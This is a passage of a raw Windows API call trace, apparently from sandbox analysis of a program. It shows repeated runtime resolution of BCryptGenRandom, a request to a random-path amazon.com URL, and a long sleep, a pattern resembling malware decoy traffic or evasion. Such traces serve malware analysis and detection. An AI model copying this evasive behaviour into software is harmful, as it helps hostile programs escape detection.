hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.980] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0164.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.981] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.981] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.982] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.982] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.983] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.983] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.984] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0164.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0164.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0164.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0165.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0165.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0165.166] GetProcessHeap () returned 0x440000 [0165.166] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0165.166] lstrcpyA (in: lpString1=0x472b10, lpString2="https://www.amazon.com" | out: lpString1="https://www.amazon.com") returned="https://www.amazon.com" [0165.166] lstrcatA (in: lpString1="https://www.amazon.com", lpString2="/atnDhleS2dVn9jg4ai3l0npisNldz1euwxjqd/wmiak7dezaeR8p6qawEaa35p4o91zekqTWk/s1chmv1hc1pi37bSehpmg3o4tc1ixYN8o497Cn3u3htafh2q/" | out: lpString1="https://www.amazon.com/atnDhleS2dVn9jg4ai3l0npisNldz1euwxjqd/wmiak7dezaeR8p6qawEaa35p4o91zekqTWk/s1chmv1hc1pi37bSehpmg3o4tc1ixYN8o497Cn3u3htafh2q/") returned="https://www.amazon.com/atnDhleS2dVn9jg4ai3l0npisNldz1euwxjqd/wmiak7dezaeR8p6qawEaa35p4o91zekqTWk/s1chmv1hc1pi37bSehpmg3o4tc1ixYN8o497Cn3u3htafh2q/" [0165.166] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0165.166] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="https://www.amazon.com/atnDhleS2dVn9jg4ai3l0npisNldz1euwxjqd/wmiak7dezaeR8p6qawEaa35p4o91zekqTWk/s1chmv1hc1pi37bSehpmg3o4tc1ixYN8o497Cn3u3htafh2q/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0xcc0014 [0167.404] GetProcAddress (hModule=0x7ffc51070000, lpProcName="HttpQueryInfoA") returned 0x7ffc510f2880 [0167.404] HttpQueryInfoA (in: hRequest=0xcc0014, dwInfoLevel=0x20000005, lpBuffer=0x46ffe60, lpdwBufferLength=0x46ffea8, lpdwIndex=0x0 | out: lpBuffer=0x46ffe60*, lpdwBufferLength=0x46ffea8*=0x4, lpdwIndex=0x0) returned 1 [0167.404] GetProcessHeap () returned 0x440000 [0167.404] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x381) returned 0x24697c0 [0167.404] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetReadFile") returned 0x7ffc510ddec0 [0167.404] InternetReadFile (in: hFile=0xcc0014, lpBuffer=0x24697c0, dwNumberOfBytesToRead=0x381, lpdwNumberOfBytesRead=0x46ffe78 | out: lpBuffer=0x24697c0*, lpdwNumberOfBytesRead=0x46ffe78*=0x381) returned 1 [0167.405] GetProcessHeap () returned 0x440000 [0167.405] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x24697c0 | out: hHeap=0x440000) returned 1 [0167.406] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetCloseHandle") returned 0x7ffc510af7f0 [0167.406] InternetCloseHandle (hInternet=0xcc0014) returned 1 [0167.406] GetProcessHeap () returned 0x440000 [0167.406] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0167.406] GetProcessHeap () returned 0x440000 [0167.406] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17200 | out: hHeap=0x440000) returned 1 [0167.408] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0167.409] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0167.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0167.411] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0167.411] Sleep (dwMilliseconds=0x15b40) [0167.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0167.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.413] GetProcessHeap () returned 0x440000 [0167.413] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4eb0 [0167.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4eb1, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x4d4eb1) returned 0x0 [0167.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0167.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0167.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4ed9, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x4d4ed9) returned 0x0 [0167.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0167.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0167.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0167.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | 